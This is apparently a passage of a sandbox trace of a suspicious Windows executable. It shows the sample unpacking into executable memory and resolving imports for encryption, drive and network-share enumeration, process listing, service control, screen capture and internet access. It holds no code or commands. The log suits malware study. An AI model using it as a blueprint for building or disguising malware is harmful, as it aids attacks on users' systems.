(hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0100.993] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0100.993] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0100.993] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0100.993] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0100.993] SetErrorMode (uMode=0x400) returned 0x0 [0100.993] SetErrorMode (uMode=0x0) returned 0x400 [0100.994] GetVersionExA (in: lpVersionInformation=0x18d734*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18d734*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.994] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fb0000 [0101.016] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18e7bc | out: lpflOldProtect=0x18e7bc*=0x2) returned 1 [0101.445] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.452] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0101.452] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0101.453] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0101.453] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0101.453] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0101.453] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0101.453] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0101.460] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0101.460] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0101.460] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0101.460] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0101.482] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0101.482] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0101.482] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0101.482] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0101.483] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0101.483] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0101.483] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0101.483] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0101.486] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0101.486] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0101.487] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0101.487] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0101.487] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0101.488] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0101.489] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0101.490] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0101.491] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0101.492] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0101.493] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0101.494] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0101.495] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0101.496] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0101.497] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0101.498] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0101.499] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0101.500] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0101.500] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0101.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0101.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0101.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0101.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0101.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0101.502] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0101.502] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0101.503] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0101.504] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0101.504] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0101.504] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0101.504] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0101.504] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0101.504] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0101.504] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0101.504] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0101.504] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0101.505] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0101.506] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0101.506] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0101.511] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0101.511] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0101.511] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0101.511] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0101.511] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0101.511] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0101.511] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0101.512] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0101.512] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0101.512] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0101.512] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0101.512] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0101.512] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0101.512] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0101.513] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0101.513] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0101.513] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0101.513] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0101.513] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0101.513] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0101.513] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0101.525] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0101.525] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0101.527] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0101.527] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0101.527] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0101.527] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0101.546] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0101.546] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0101.546] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0101.546] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0101.547] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0101.547] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0101.548] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0101.548] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0101.548] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0101.554] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0101.554] atexit (param_1=0x1e30920) returned 0 [0101.562] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e7cc | out: lpSystemTimeAsFileTime=0x18e7cc*(dwLowDateTime=0x1a563140, dwHighDateTime=0x1d5fd35)) [0101.562] GetCurrentThreadId () returned 0xb64 [0101.563] GetCurrentProcessId () returned 0x9c8 [0101.563] QueryPerformanceCounter (in: lpPerformanceCount=0x18e7c4 | out: lpPerformanceCount=0x18e7c4*=22182532914) returned 1 [0101.609] GetStartupInfoW (in: lpStartupInfo=0x18e75c | out: lpStartupInfo=0x18e75c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0101.623] GetProcessHeap () returned 0x730000 [0101.779] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0101.779] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0101.779] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0101.779] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0101.779] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0101.780] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0101.781] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0101.781] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0101.781] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0101.781] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0101.781] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 